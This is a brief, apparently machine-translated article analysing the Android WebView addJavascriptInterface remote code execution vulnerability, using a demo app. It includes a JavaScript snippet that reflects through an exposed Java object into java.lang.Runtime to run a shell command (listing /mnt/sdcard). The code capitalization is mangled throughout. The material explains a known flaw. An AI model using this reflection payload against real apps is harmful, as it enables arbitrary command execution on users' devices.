0x00
This article refers to the Android WebView Remote Code execution Vulnerability analysis. The code address is, Https://github.com/jltxgcy/AppVulnerability/tree/master/WebViewFileDemo. Let's analyze the code below.
0x01
First list the Project Project catalog:
The code for Mainactivity.java is as follows:
public class Mainactivity extends Activity {private WebView webview;private Uri muri;private String url;//string mUrl1 = " File:///android_asset/html/attack_file.html "; String mUrl2 = "file:///android_asset/html/test.html"; @Overrideprotected void OnCreate (Bundle savedinstancestate) { Super.oncreate (savedinstancestate); Setcontentview (r.layout.activity_main); WebView = (WebView) Findviewbyid ( R.id.webview); Webview.getsettings (). Setjavascriptenabled (True); Webview.addjavascriptinterface (new JSInterface () , "Jsinterface");//webview.getsettings (). Setallowfileaccessfromfileurls (True); Webview.setwebchromeclient (new Webchromeclient () {@Override public boolean onjsalert (WebView view, string URL, string message,jsresult result) {// Required functionality here return Super.onjsalert (view, URL, message, result);}); Webview.loadurl (MURL2);} Class Jsinterface {public String OnButtonClick (string text) {Final String str = text; Runonuithread (New Runnable () { @Override public void Run () {LOG.E ("leehong2", "onbuttonclick:text =" + str); Toast.maketext (Getapplicationcontext (), "onbuttonclick:text =" + str, toast.length_long). Show (); } }); Return "This text was returned from Java layer. JS Text = "+ text; } public void Onimageclick (String url, int width, int height) {final String str = "Onimageclick : Text = "+ URL +" width = "+ width +" height = "+ height; LOG.I ("Leehong2", str); Runonuithread (New Runnable () {@Override public void run () {Toast.makete XT (Getapplicationcontext (), str, toast.length_long). Show (); } }); } }}
The following code sets the WebView loaded HTML to interact with Java code through JavaScript.
Webview.getsettings (). Setjavascriptenabled (True); Webview.addjavascriptinterface (new Jsinterface (), "JSInterface" );
We then look at the loaded HTML file, which is located in the Aessets directory.
Webview.loadurl (MURL2);
Test.html as follows:
For an introduction to HTML and JavaScript, please refer to http://www.w3school.com.cn/html/html_getstarted.asp.The main cause of the vulnerability in this is the following code:
function Execute (Cmdargs) {for (var obj in window) { console.log (window[obj]); if ("GetClass" in Window[obj]) { alert (obj); Return Window[obj].getclass (). forname ("Java.lang.Runtime"). GetMethod ("GetRuntime", null). Invoke (Null,null). EXEC ( Cmdargs); }}} var p = execute (["LS", "/mnt/sdcard/"]);
An attacker could find an object that has a "getclass" method, then use a reflection mechanism to get the Java runtime object and then invoke a static method to execute the system command. thereby causing harm. The detailed function of this program please download the code to run and then know.
A brief analysis of the remote Code execution vulnerability of Android WebView